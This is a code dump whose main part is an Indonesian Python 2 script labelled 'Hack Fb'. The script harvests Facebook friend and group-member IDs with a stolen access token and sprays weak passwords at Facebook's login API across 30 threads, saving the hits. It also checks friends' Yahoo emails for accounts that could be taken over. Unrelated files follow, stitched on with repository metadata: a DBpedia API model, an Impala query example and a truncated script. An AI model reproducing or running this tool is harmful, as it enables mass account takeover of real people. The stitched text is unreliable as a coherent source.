print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Hack Fb Cepat"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Lihat daftar grub "
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;93m Hack penipu "
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Keluar "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
yahoo()
elif unikers =="0":
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack dari teman"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack dari member grup"
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;93m Crack dari file"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Kontol'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = 'Anjing'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken tidak ditemukan"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;96m[\033[1;92mGroup\033[1;96m]\x1b[1;97m "+str(id)+" \x1b[1;96m=>\x1b[1;97m "+str(nama)
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Clone dari teman"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Clone dari member group"
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;93m Clone dari file"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;92mVULN✓\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/TemanMailVuln.txt','w')
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;92mVULN✓\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;97mVULN✓\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;96m[\033[1;92mVULN✓\033[1;96m] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | mrwahyu-556.noreply@github.com |
609f208316babac07ccff737f84094897e5d863c | 59166105545cdd87626d15bf42e60a9ee1ef2413 | /dbpedia/models/unknown.py | dd1afb9f030bccf6a3766988d89ff96438847c90 | [] | no_license | mosoriob/dbpedia_api_client | 8c594fc115ce75235315e890d55fbf6bd555fa85 | 8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc | refs/heads/master | 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,224 | py | # coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from dbpedia.configuration import Configuration
class Unknown(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'list[str]',
'id': 'str',
'label': 'list[str]',
'type': 'list[str]'
}
attribute_map = {
'description': 'description',
'id': 'id',
'label': 'label',
'type': 'type'
}
def __init__(self, description=None, id=None, label=None, type=None, local_vars_configuration=None): # noqa: E501
"""Unknown - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._id = None
self._label = None
self._type = None
self.discriminator = None
self.description = description
if id is not None:
self.id = id
self.label = label
self.type = type
@property
def description(self):
"""Gets the description of this Unknown. # noqa: E501
small description # noqa: E501
:return: The description of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this Unknown.
small description # noqa: E501
:param description: The description of this Unknown. # noqa: E501
:type: list[str]
"""
self._description = description
@property
def id(self):
"""Gets the id of this Unknown. # noqa: E501
identifier # noqa: E501
:return: The id of this Unknown. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Unknown.
identifier # noqa: E501
:param id: The id of this Unknown. # noqa: E501
:type: str
"""
self._id = id
@property
def label(self):
"""Gets the label of this Unknown. # noqa: E501
short description of the resource # noqa: E501
:return: The label of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this Unknown.
short description of the resource # noqa: E501
:param label: The label of this Unknown. # noqa: E501
:type: list[str]
"""
self._label = label
@property
def type(self):
"""Gets the type of this Unknown. # noqa: E501
type of the resource # noqa: E501
:return: The type of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Unknown.
type of the resource # noqa: E501
:param type: The type of this Unknown. # noqa: E501
:type: list[str]
"""
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Unknown):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Unknown):
return True
return self.to_dict() != other.to_dict()
| [
"maxiosorio@gmail.com"
] | maxiosorio@gmail.com |
fa1c32b002a192e0bd07992d6d5fd0beba4b6a66 | 28b48d7c0897ebb977ce867a82f6d963089e7e04 | /Python-examples/impala-pyodbc-example.py | 37096c311000dc6611110c1f33bb2b3079c89f06 | [
"Apache-2.0"
] | permissive | smaerkl/spark-impala-interfaces | 8343099331aafcdedfd4ffc7a9e2d11f41acaa66 | 675f11a471e897f8676227c7fa55fe280bb1d2ce | refs/heads/master | 2021-01-25T10:22:17.281288 | 2018-02-28T19:02:38 | 2018-02-28T19:02:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,078 | py | # Copyright 2018 Cloudera, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script requires that the Impala ODBC driver is installed on the host
# Modify .odbc.ini and .odbcinst.ini before running
if sys.version_info[0] == 2:
!pip install pyodbc
else:
!pip3 install pyodbc
import pyodbc
import pandas as pd
con = pyodbc.connect('DSN=Impala DSN', autocommit=True)
sql = '''
SELECT origin,
COUNT(*) AS num_departures,
AVG(dep_delay) AS avg_dep_delay
FROM flights
WHERE dest = 'LAS'
GROUP BY origin
ORDER BY avg_dep_delay'''
pd.read_sql(sql, con)
| [
"icook@cloudera.com"
] | icook@cloudera.com |
1157b7b6ae259052ef1e69bb7e9e69f37b290851 | abd09d49466fc36968e379fb394347d2559b4240 | /src/data/utils_xmmty.py | aa115d60f8ec2fa09e23d2692065aa2d855bb04e | [
"MIT"
] | permissive | dypromise/insightface | 8077a1b5ae0f838fb1fa074b943fca6990cb74fb | 34df2d52f7ab5c3ddf54bc8834b4d5efb2a8b2bc | refs/heads/master | 2020-05-01T14:57:42.186122 | 2019-04-01T10:43:47 | 2019-04-01T10:43:47 | 177,533,893 | 0 | 0 | null | 2019-03-25T07:14:44 | 2019-03-25T07:14:44 | null | UTF-8 | Python | false | false | 530 | py | import shutil
import os
def rename_celebrity():
val_dir = '/home/xmmtyding/data1/celebrity_val_aligned/'
for _dir in os.listdir(val_dir):
_id = _dir
cnt = 0
this_dir = os.path.join(val_dir, _dir)
